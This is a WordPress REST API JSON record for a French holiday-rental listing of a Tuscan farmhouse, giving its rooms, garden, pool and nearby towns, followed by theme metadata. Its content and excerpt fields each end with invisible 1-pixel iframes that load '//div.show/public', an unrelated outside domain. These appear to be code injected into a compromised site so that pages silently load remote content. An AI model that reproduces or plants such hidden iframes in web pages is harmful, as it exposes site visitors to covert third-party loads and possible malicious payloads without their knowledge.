{"id":3690,"date":"2023-05-01T09:54:27","date_gmt":"2023-05-01T07:54:27","guid":{"rendered":"https:\/\/antichefamiglietoscane.com\/accommodations\/ferme-san-bernardo\/"},"modified":"2024-04-28T10:37:31","modified_gmt":"2024-04-28T08:37:31","slug":"ferme-san-bernardo","status":"publish","type":"product","link":"https:\/\/antichefamiglietoscane.com\/fr\/accommodations\/ferme-san-bernardo\/","title":{"rendered":"Ferme San Bernardo"},"content":{"rendered":"<p>Une grande et charmante ferme en pierre avec une vue imprenable sur les oliveraies, les bois de ch\u00eanes verts et les champs environnants. Il s&#8217;agit d&#8217;une maison ind\u00e9pendante, situ\u00e9e dans un endroit tr\u00e8s calme et suggestif, avec un acc\u00e8s priv\u00e9, mais \u00e0 seulement 100 m\u00e8tres du ch\u00e2teau. Une loggia habitable et ombrag\u00e9e, situ\u00e9e en haut de l&#8217;escalier ext\u00e9rieur, ouvre sur le logement du premier \u00e9tage. Grand salon avec grande chemin\u00e9e traditionnelle, cuisine bien \u00e9quip\u00e9e avec lave-vaisselle, 5 chambres doubles \u00e9l\u00e9gantes, deux salles de bains. Lave-linge au rez-de-chauss\u00e9e.<br \/>\nGrand jardin priv\u00e9 avec mobilier de jardin et barbecue.<br \/>\nLa piscine 10X20 se trouve \u00e0 quelques m\u00e8tres.<br \/>\nCommerces, restaurants et villes les plus proches \u00e0 seulement 4 km.<br \/>\nMontepulciano et Pienza sont accessibles en 20 minutes ; Sienne et P\u00e9rouse en 1 heure ; Florence et Rome en 1 heure et demie.<\/p>\n<h5>Structure<\/h5>\n<h6><strong>A l&#8217;int\u00e9rieur<\/strong><\/h6>\n<ul>\n<li>Cuisine<\/li>\n<li>Salle \u00e0 manger<\/li>\n<li>1 salon(s)<\/li>\n<li>2 chambre(s) double(s)<\/li>\n<li>3 chambre(s) \u00e0 lits jumeaux<\/li>\n<li>1 salle(s) de bain avec douche<\/li>\n<li>1 salle(s) de bain avec baignoire<\/li>\n<\/ul>\n<h6><strong>A l&#8217;ext\u00e9rieur<\/strong><\/h6>\n<ul>\n<li>Jardin<\/li>\n<li>Mobilier de jardin<\/li>\n<li>Grand parking<\/li>\n<li>1 loggia(s) \/ balcon(s)<\/li>\n<\/ul>\n\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"featured_media":2880,"template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_brand":[],"product_cat":[497,493,492],"product_tag":[528,494,543,518,531,495],"class_list":{"0":"post-3690","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-10-lits-ou-plus","7":"product_cat-ferme-palazzo-di-piero","8":"product_cat-location-de-gites-ruraux","9":"product_tag-10-lits-ou-plus","10":"product_tag-ferme","11":"product_tag-grande-piscine","12":"product_tag-grands-groupes","13":"product_tag-la-campagne-toscane","14":"product_tag-restauration","15":"desktop-align-center","16":"tablet-align-left","17":"mobile-align-left","19":"first","20":"outofstock","21":"shipping-taxable","22":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/product\/3690","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/media\/2880"}],"wp:attachment":[{"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/media?parent=3690"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/product_brand?post=3690"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/product_cat?post=3690"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/antichefamiglietoscane.com\/fr\/wp-json\/wp\/v2\/product_tag?post=3690"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}